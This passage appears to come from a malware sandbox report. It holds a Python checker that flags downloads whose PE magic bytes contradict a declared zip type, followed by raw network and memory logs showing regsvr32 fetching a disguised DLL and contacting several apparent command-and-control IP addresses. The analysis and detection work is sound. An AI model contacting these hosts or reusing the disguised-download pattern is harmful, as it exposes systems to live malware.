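    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, 5, 0x5DD594DF, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)            # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x5D208)         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x10000000)      # ImageBase
    struct.pack_into("<HH", opt, 68, 2, 0x0140)      # Subsystem GUI, DllCharacteristics
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, rptr, 0, 0, 0, 0, chars)
        for name, vsize, va, rsize, rptr, chars in [
            (b".text",  0x77209, 0x01000, 0x77400, 0x00400, 0x60000020),
            (b".rdata", 0x558AE, 0x79000, 0x55A00, 0x77800, 0x40000040),
            (b".data",  0x15BAC, 0xCF000, 0x01000, 0xCD200, 0xC0000040),
            (b".rsrc",  0x00508, 0xE5000, 0x00600, 0xCE200, 0x40000040),
            (b".reloc", 0x02708, 0xE6000, 0x02800, 0xCE800, 0x42000040),
        ])
    return bytes(dos) + coff + bytes(opt) + sections


def parse_pe(data: bytes) -> dict:
    """Minimal PE header parse: enough to say what kind of image this is."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("MZ header without PE signature at e_lfanew")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    sec_tbl = opt + opt_size
    sections = [struct.unpack_from("<8sIIII", data, sec_tbl + 40 * i) for i in range(nsec)]
    return {
        "machine": machine,
        "pe_format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "compile_time": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "sections": [name.rstrip(b"\0").decode() for name, *_ in sections],
        # Smallest file that can hold every section: end of the last raw section.
        "expected_file_size": max(rptr + rsize for _, _, _, rsize, rptr in sections),
    }


def sniff(body: bytes) -> str:
    if body[:2] == b"PK":
        return "zip"
    if body[:2] == b"MZ" and len(body) >= 0x40:
        return "pe"
    return "unknown"


# Assumed mappings from what the HTTP layer declares to the magic we expect to see.
EXPECTED_MAGIC = {"application/zip": "zip", "application/x-msdownload": "pe"}
EXT_MAGIC = {"zip": "zip", "exe": "pe", "dll": "pe"}


def classify_download(content_type: str, url_path: str, body: bytes,
                      content_length: Optional[int] = None) -> dict:
    """Compare the declared Content-Type / URL extension with the body's real magic."""
    ext = url_path.rsplit(".", 1)[-1].lower() if "." in url_path else ""
    magic = sniff(body)
    result = {"declared_type": content_type, "url_extension": ext, "magic": magic}
    if magic == "pe":
        result.update(parse_pe(body))
        if content_length is not None:
            result["size_consistent"] = content_length == result["expected_file_size"]
    expected = EXPECTED_MAGIC.get(content_type.split(";")[0].strip().lower())
    result["mismatch"] = magic != "unknown" and (
        (expected is not None and expected != magic)
        or (EXT_MAGIC.get(ext) is not None and EXT_MAGIC[ext] != magic))
    return result


if __name__ == "__main__":
    for k, v in classify_download("application/zip", "/hknmwj.zip",
                                  build_sample_pe_header(), 856064).items():
        print(f"{k}: {v}")
```

On the report's values this reports magic "pe", PE32, Machine 0x14c, is_dll True, the five section names, an expected file size of 856064 that matches Content-Length, and mismatch True. The same check belongs in any proxy or EDR download inspector: a body whose magic contradicts both the MIME type and the URL extension is worth quarantining regardless of what the server claims.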
Source: Joe Sandbox View | IP Address: 69.164.207.140
Source: Joe Sandbox View | IP Address: 211.110.44.63
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global traffic | HTTP traffic detected:
GET /hknmwj.zip HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: stellarum.com.br
Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown | TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comF equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433177539.0000000000369000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: qsf.surfescape.net
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp | String found in binary or memory: http://crl.co
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabEK
Source: regsvr32.exe, 00000011.00000002.2492560886.000000000053C000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2105222828.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2120262017.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2121003757.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2458603358.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2510481818.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2253344660.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000F.00000002.2253526662.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2440450809.0000000001CB0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmp | String found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp | String found in binary or memory: https://194.225.58.214/C
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp | String found in binary or memory: https://194.225.58.214/P
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmp | String found in binary or memory: https://194.225.58.214/X
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp | String found in binary or memory: https://194.225.58.214/Y
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100/_
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100:3786/&
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100:3786/XE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://198.57.200.100:3786/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://211.110.44.63:5353/8
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140/M
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140/T
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140:3388/7
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140:3388/C
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140:3388/JE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown | Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49300
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown | Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown | Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown | Network traffic detected: HTTP traffic on port 49281 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49298 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown | Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown | Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49294
